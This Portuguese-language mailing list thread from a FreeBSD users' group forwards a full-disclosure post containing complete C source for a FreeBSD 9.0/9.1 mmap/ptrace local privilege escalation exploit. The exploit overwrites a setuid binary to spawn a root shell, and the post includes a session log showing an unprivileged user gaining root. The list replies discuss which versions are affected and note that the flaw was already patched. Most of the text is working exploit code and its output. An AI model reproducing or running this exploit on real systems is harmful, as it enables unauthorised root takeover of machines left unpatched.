[FUG-BR] Fwd: Happy Birthday FreeBSD! Now you are 20 years old and your security is the same as 20 years ago... :)

Evandro Nunes evandronunes12 em gmail.com
Quinta Junho 20 18:01:24 BRT 2013


sysadmins com noção de 2 décadas atrás? quem dera!

os que trabalham por aqui (orgão público, vocês que pagam o salário deles
sim, protestem! rsss) não tem noção de MS-DOS como usuários finais tinham
há 20 anos atrás, eu pedi para modificarem um logonscript com 3 linhas que
há 20 anos eram triviais em qualquer autoexec.bat da vida e não conseguiram
então patrick, é otimismo seu acreditar que temos sysadmins com noção de 20
anos atrás seja de segurança ou de... sysadministration basics ;-)

hoje linuxer usa ubuntu, na minha época era slack
hoje se conhece mais de pfsense e pcbsd do que freebsd e openbsd
a geração atual não tem interesse (e cada vez menos necessidade) de
aprender nada além do mínimo, ou um pouco menos rsss. na minha época se
repetia de ano na escola, hoje tem progressão continuada rsss


2013/6/20 Marcelo Gondim <gondim em bsdinfo.com.br>

> Em 20/06/13 15:42, Evandro Nunes escreveu:
> > On Thu, Jun 20, 2013 at 9:29 AM, Marcelo Gondim <gondim em bsdinfo.com.br
> >wrote:
> >
> >> É pessoal,
> >>
> >> Sei que a vulnerabilidade foi corrigida agora mas foram 20 anos para
> >> detectar isso?  :(
> >> E funciona lindo mesmo o programa.
> >>
> > de onde saiu isso que tem 20 anos? pelo pouco que deu pra ler explora uma
> > falha do freebsd 9 inclusive o security adv so explora o freebsd 9
> > alguem teve sucesso com freebsd 8, 7, outro?
> > acho que a frase "seguranca de 20 anos atras" foi apenas ironiazinha
> > pelo que vi esse vulnerabilidade nao afeta quem tem debug de processo nao
> > root nem quem tem mac_partition ou bsdextended implementado
> >
> > nego quer é aparecer rss rsss a falha tai, mas não teve 0day inclusive o
> > "ultra mega hacker expert" só fez o exploit depois que o advisory foi
> > publicado, e ainda levou 2 dias pra conseguir explorar o que ja estava
> > documentado e corrigido e vem tirar uma onda de full disclosure...
> Pois é recebi isso em uma lista de segurança que assino. Consegui um 8.4
> e testei e não rola. Só no 9 mesmo.
> Esses caras são uns paiaços mesmo rsrsrsrsrs
>
> >
> >
> >>
> >> -------- Mensagem original --------
> >> Assunto:        Happy Birthday FreeBSD! Now you are 20 years old and
> your
> >> security is the same as 20 years ago... :)
> >> Data:   Wed, 19 Jun 2013 23:32:59 +0200
> >> De:     Hunger <hunger em hunger.hu>
> >> Para:   full-disclosure em lists.grok.org.uk
> >>
> >>
> >>
> >> $ uname -a
> >> FreeBSD fbsd91x64 9.1-RELEASE FreeBSD 9.1-RELEASE #0 r243825: Tue Dec
> >> 4 09:23:10 UTC 2012
> >> root em farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  amd64
> >> $ id
> >> uid=1001(hunger) gid=1002(hunger) groups=1002(hunger)
> >> $ gcc fbsd9lul.c -o fbsd9lul
> >> $ ./fbsd9lul
> >> FreeBSD 9.{0,1} mmap/ptrace exploit
> >> by Hunger <fbsd9lul em hunger.hu>
> >> # id
> >> uid=0(root) gid=0(wheel) egid=1002(hunger) groups=1002(hunger)
> >> #
> >>
> >>
> >> ============================ code =========================
> >>
> >> /*
> >>    * FreeBSD 9.{0,1} mmap/ptrace exploit
> >>    * by Hunger<fbsd9lul em hunger.hu>
> >>    *
> >>    * Happy Birthday FreeBSD!
> >>    * Now you are 20 years old and your security is the same as 20 years
> >> ago...
> >>    *
> >>    * Greetings to #nohup, _2501, boldi, eax, johnny_b, kocka, op,
> pipacs,
> >> prof,
> >>    *              sd, sghctoma, snq, spender, s2crew and others at
> >> #hekkcamp:
> >>    *                      I hope we'll meet again at 8 em 1470n
> >>    *
> >>    * Special thanks to proactivesec.com
> >>    *
> >>    */
> >>
> >> #include <err.h>
> >> #include <errno.h>
> >> #include <unistd.h>
> >> #include <stdio.h>
> >> #include <stdlib.h>
> >> #include <string.h>
> >> #include <fcntl.h>
> >> #include <sys/stat.h>
> >> #include <sys/mman.h>
> >> #include <sys/types.h>
> >> #include <sys/ptrace.h>
> >> #include <sys/wait.h>
> >>
> >> #define SH "/bin/sh"
> >> #define TG "/usr/sbin/timedc"
> >>
> >> int
> >> main(int ac, char **av) {
> >>      int from_fd, to_fd, status;
> >>      struct stat st;
> >>      struct ptrace_io_desc piod;
> >>      char *s, *d;
> >>      pid_t pid;
> >>
> >>      if (geteuid() == 0)  {
> >>           setuid(0);
> >>           execl(SH, SH, NULL);
> >>           return 0;
> >>      }
> >>
> >>      printf("FreeBSD 9.{0,1} mmap/ptrace exploit\n");
> >>      printf("by Hunger<fbsd9lul em hunger.hu>\n");
> >>
> >>      if ((from_fd = open(av[0], O_RDONLY)) == -1 ||
> >>           (to_fd = open(TG, O_RDONLY)) == -1)
> >>                   err(1, "open");
> >>
> >>      if (stat(av[0], &st) == -1)
> >>           err(2, "stat");
> >>
> >>      if (((s = mmap(NULL, (size_t)st.st_size, PROT_READ,
> >>           MAP_SHARED, from_fd, (off_t)0)) == MAP_FAILED) ||
> >>                   (d = mmap(NULL, (size_t)st.st_size, PROT_READ,
> >>                           MAP_SHARED|MAP_NOSYNC, to_fd, (off_t)0)) ==
> >> MAP_FAILED)
> >>                                   err(3, "mmap");
> >>
> >>      if ((pid = fork()) == -1)
> >>           err(4, "fork");
> >>
> >>      if (!pid) {
> >>           if (ptrace(PT_TRACE_ME, pid, NULL, 0) == -1)
> >>                   err(5, "ptraceme");
> >>
> >>           return 0;
> >>           }
> >>
> >>      if (ptrace(PT_ATTACH, pid, NULL, 0) == -1)
> >>           err(6, "ptattach");
> >>
> >>      if (wait(&status) == -1)
> >>           err(7, "wait");
> >>
> >>      piod.piod_op = PIOD_WRITE_D;
> >>      piod.piod_offs = d;
> >>      piod.piod_addr = s;
> >>      piod.piod_len  = st.st_size;
> >>
> >>      if (ptrace(PT_IO, pid, (caddr_t)&piod, 0) == -1)
> >>           err(8, "ptio");
> >>
> >>      execl(TG, TG, NULL);
> >>
> >>      return 0;
> >> }
> >>
> >>
> >>
> >> -------------------------
> >> Histórico: http://www.fug.com.br/historico/html/freebsd/
> >> Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
> >>
> > -------------------------
> > Histórico: http://www.fug.com.br/historico/html/freebsd/
> > Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
> >
>
> -------------------------
> Histórico: http://www.fug.com.br/historico/html/freebsd/
> Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
>


Mais detalhes sobre a lista de discussão freebsd